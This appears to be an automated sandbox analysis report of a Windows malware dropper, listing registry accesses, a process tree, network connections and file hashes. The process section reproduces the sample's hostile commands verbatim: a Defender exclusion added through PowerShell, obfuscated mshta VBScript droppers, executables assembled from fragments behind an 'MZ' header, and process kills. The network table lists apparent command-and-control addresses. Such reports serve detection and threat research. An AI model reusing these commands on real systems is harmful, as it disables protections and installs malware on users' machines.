| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2050293ea5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209c4b463b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe
Fri2002ce5f91c761.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe
Fri209f6924af86d795.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe
Fri208f5f140853548.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe
Fri20e095683c2b3a0c.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe
Fri20109b9e174d0fc.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe
Fri20c0c46650eeb2a.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe
Fri20d5530575e8aa3ed.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe
Fri200ae385720d3.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe
Fri2060ea1c5d8fae8aa.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe
Fri2050293ea5.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe
Fri20ee0a6fe195bd09.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe
Fri209d5bfbb2.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe
Fri20ba391d4469.exe
C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-QR0BN.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$701B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe
"C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$801B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 272
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"
C:\Users\Admin\AppData\Local\Temp\09xU.exE
09xU.EXE -pPtzyIkqLZoCarb5ew
C:\Windows\SysWOW64\taskkill.exe
taskkill /F -Im "Fri208f5f140853548.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe
EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /IM "Fri20ba391d4469.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
C:\Windows\SysWOW64\control.exe
control .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"
C:\Windows\SysWOW64\msiexec.exe
msiexec /Y .\6~iPCLZ.rJ
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2280 -s 480
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | ppp-gl.biz | udp |
| US | 8.8.8.8:53 | hsiens.xyz | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 104.155.138.21:80 | ppp-gl.biz | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | tcp | |
| FR | 51.178.186.149:80 | tcp | |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| US | 104.26.3.46:443 | iplogger.org | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| US | 107.178.223.183:80 | ppp-gl.biz | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 88.221.134.83:80 | crl.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:80 | www.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| N/A | 127.0.0.1:49285 | tcp | |
| N/A | 127.0.0.1:49287 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| NL | 45.9.20.13:80 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| FI | 135.181.129.119:4805 | tcp | |
| FI | 135.181.129.119:4805 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe
| MD5 | 789258af8927e9426e113f79a5c2ebcf |
| SHA1 | 6c64f717f5fc68e602760fefbc2221fd35fd7530 |
| SHA256 | f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923 |
| SHA512 | 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3 |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2280-61-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2280-71-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2280-70-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2280-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2280-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2280-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2280-79-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2280-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2280-78-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2280-77-0x000000006494A000-0x000000006494F000-memory.dmp
memory/2280-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2280-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2280-72-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0BB86396\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/2280-58-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0BB86396\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe
| MD5 | ba8541c57dd3aae16584e20effd4c74c |
| SHA1 | 5a49e309db2f74485db177fd9b69e901e900c97d |
| SHA256 | dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c |
| SHA512 | 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d |
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe
| MD5 | 1902e1df4ecf3bf7bcfc0c53b992cd24 |
| SHA1 | a0c9cde0b2113466a820fa6ebcccfdcd93b26b97 |
| SHA256 | c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720 |
| SHA512 | 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6 |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe
| MD5 | 39fbed3967544cc6a59e1d1152cdcc35 |
| SHA1 | b9e974a506f3be7fc78574ae008e7686093eb82d |
| SHA256 | cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6 |
| SHA512 | cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3 |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe
| MD5 | a98672182143436478fdb3806ef6cd5a |
| SHA1 | 5d93bb55d9e7915afb11361f42a4c9c6393718b3 |
| SHA256 | 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528 |
| SHA512 | 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892 |
C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe
| MD5 | 37a1c118196892aa451573a142ea05d5 |
| SHA1 | 4144c1a571a585fef847da516be8d89da4c8771e |
| SHA256 | a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a |
| SHA512 | aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db |
\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
memory/1444-132-0x0000000000400000-0x0000000000414000-memory.dmp
memory/372-131-0x00000000002A0000-0x00000000002A8000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe
| MD5 | 8aaec68031b771b85d39f2a00030a906 |
| SHA1 | 7510acf95f3f5e1115a8a29142e4bdca364f971f |
| SHA256 | dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b |
| SHA512 | 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df |
memory/1928-143-0x0000000001030000-0x0000000001048000-memory.dmp
